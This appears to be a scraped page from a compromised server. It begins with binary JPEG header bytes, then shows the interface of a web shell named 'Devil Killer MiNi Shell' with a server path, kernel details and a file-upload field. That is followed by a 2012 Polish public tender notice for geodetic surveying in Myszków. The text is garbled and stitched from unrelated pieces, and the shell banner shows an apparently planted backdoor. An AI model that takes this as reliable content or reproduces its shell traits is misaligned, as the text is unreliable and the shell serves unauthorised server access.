JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120917/199081-N-2012.html

<p class="kh_header"><b>Myszków: Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej</b><br>
<b>Numer ogłoszenia: 199081 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac geodezyjnych w zakresie:
Zadanie  nr 1
Wykonanie pomiaru i sporządzenie  dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej nieruchomości zajętych  pod linie kolejowe Kolej  warszawsko-wiedeńska ( tereny zamknięte) położonych w:
-Myszkowie  ozn nr : 66  o pow. 6,4294 ha   
-Myszkowie  ozn nr : 369  o pow. 9,7202 ha 
-Kręciwilku  ozn nr 1 o pow. 2,5138 ha
-Nieradzie    ozn nr  153 o pow.12,6129 ha
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz.

Zadanie  nr 2
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek położonych w obrębie Sokolniki ozn. nr 969/1, 969/2, 969/3, 717/1, 717/2, 717/3, 717/4, 717/5 o pow. 1,3798 ha ( droga wojewódzka  Nr 794 relacji Koniecpol - Lelów - Pradła - Pilica - Wolbrom).
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  
  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz.

Zadanie  nr 3
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek wchodzących w skład drogi wojewódzkiej Nr 789 relacji Woźniki - Koziegłowy - Żarki - Lelów, położonych w Myszkowie, obręb:                           
- Nowa Wieś ozn. nr 1995 o pow. 0,4364 ha.
- Myszków    ozn. nr  10050 o pow. 1,5000 ha.
W ramach pomiaru należy:
g.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
h.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
i.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
j.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
k.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
l.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne  w 3  egz.
              - kserokopia szkicu polowego  w 1 egz.

Zadanie  nr 4
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla nieruchomości położonej w Myszkowie  ozn. nr 1652 o pow. 0,1421 ha. (droga do stadionu)


W ramach pomiaru należy:
m.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
n.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
o.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
p.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
q.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
r.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz.

Zadanie  nr 5
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla nieruchomości położonej w Myszkowie, obręb Mrzygłódka  ozn. nr 1421 o pow. 0,4924 ha. 
W ramach pomiaru należy:
s.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
t.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
u.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
v.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
w.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
x.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz.

Zadanie  nr 6
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek wchodzących w skład drogi powiatowej Nr 08460 dla nieruchomości położonej w Ogorzelniku ozn. nr 190 o pow. 3,6065 ha. 
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  
  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne  w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..
g.	sporządzić  wykaz działek zajętych pod drogę, dla których konieczne będzie wykonanie podziału ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium.
2. Wadium ustala się w wysokości odpowiednio dla poszczególnych zadań:
-dla zadania nr 1:  1.200,00 zł ( słownie: jeden tysiąc dwieście złotych)
-dla zadania nr 2:  650,00 zł ( słownie: sześćset pięćdziesiąt złotych)
-dla zadania nr 3:  350,00 zł ( słownie: trzysta pięćdziesiąt złotych)
-dla zadania nr 4:  400,00 zł ( słownie: czterysta złotych)
-dla zadania nr 5:  300,00 zł ( słownie: trzysta złotych)
-dla zadania nr 6:  650,00 zł ( słownie: sześćset pięćdziesiąt złotych)
3. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.  Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
5. Wadium w pieniądzu należy wnieść przelewem  na konto zamawiającego:
 Starostwo Powiatowe w Myszkowie,
nr rachunku bankowego zamawiającego :
Bank Gospodarki Żywnościowej S.A. 64 2030 0045 1110 0000 0174 9900
podając nazwę wpłacającego oraz informacje czego wpłata dotyczy
wadium na Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej (zadanie nr ...)
Kserokopię polecenia przelewu potwierdzoną za zgodność z oryginałem przez Wykonawcę należy dołączyć do oferty.
Wadium wniesione w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert, tj. do dnia  25.09.2012 r. do godz. 10 00 . W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez zamawiającego terminowego wniesienia wadium przez wykonawcę. 
Wadium w innej formie niż pieniądz należy złożyć przed upływem terminu składania ofert            w formie oryginału w KASIE Starostwa Powiatowego w Myszkowie na Sali Obsługi Interesantów, Starostwo Powiatowe w Myszkowie, 42 - 300 Myszków,  ul. Pułaskiego 6, a kserokopię wniesienia wadium potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu wykonawcy dołączyć do oferty.
6. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
7. Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
8. Wykonawca, który nie wniósł wadium w wyznaczonym terminie oraz w formie określonej niniejszą SIWZ, zostanie wykluczony z postępowania.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a art.46 ustawy PZP.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
13. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń,                o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to                z przyczyn  nieleżących po jego stronie.
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta  została wybrana:
          1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
        2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
        3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca wykaże, iż wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę z zakresu przedmiotu zamówienia (prace zakończone) o wartości odpowiednio:
- dla Zadania nr 1 - co najmniej jedną usługę o wartości co najmniej   20 000 zł brutto
- dla Zadania nr 2 -  co najmniej jedną usługę o wartości co najmniej  10 000 zł brutto
- dla Zadania nr 3 - co najmniej jedną usługę o wartości co najmniej     6 000 zł brutto
- dla Zadania nr 4 - co najmniej jedną usługę o wartości co najmniej     7 000 zł brutto
- dla Zadania nr 5 - co najmniej jedną usługę o wartości co najmniej     5 000 zł brutto
- dla Zadania nr 6 - co najmniej jedną usługę o wartości co najmniej   10 000 zł brutto
Wykaz musi zawierać wszystkie dane wyszczególnione w załączniku nr 4 do SIWZ. 
      Do wykazu należy dołączyć dokumenty potwierdzające, że wskazane usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, to jest załączy do oferty wykaz osób ( załącznik nr 5 do SIWZ), które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Z wykazu musi wynikać, że Wykonawca dysponuje dla realizacji przedmiotu zamówienia osobami, z których co najmniej jedna posiada uprawnienia zawodowe w zakresie geodezji i kartografii (zakres 2). Do wykazu należy dołączyć oświadczenie (załącznik nr 6 do SIWZ), że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, czyli: oświadczenie o posiadaniu uprawnień zawodowych w zakresie geodezji i kartografii (zakres 2) zgodnie z przepisami ustawy Prawo geodezyjne i kartograficzne, przez osoby, które będą uczestniczyć w wykonaniu zamówienia- co najmniej 1 osoba.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

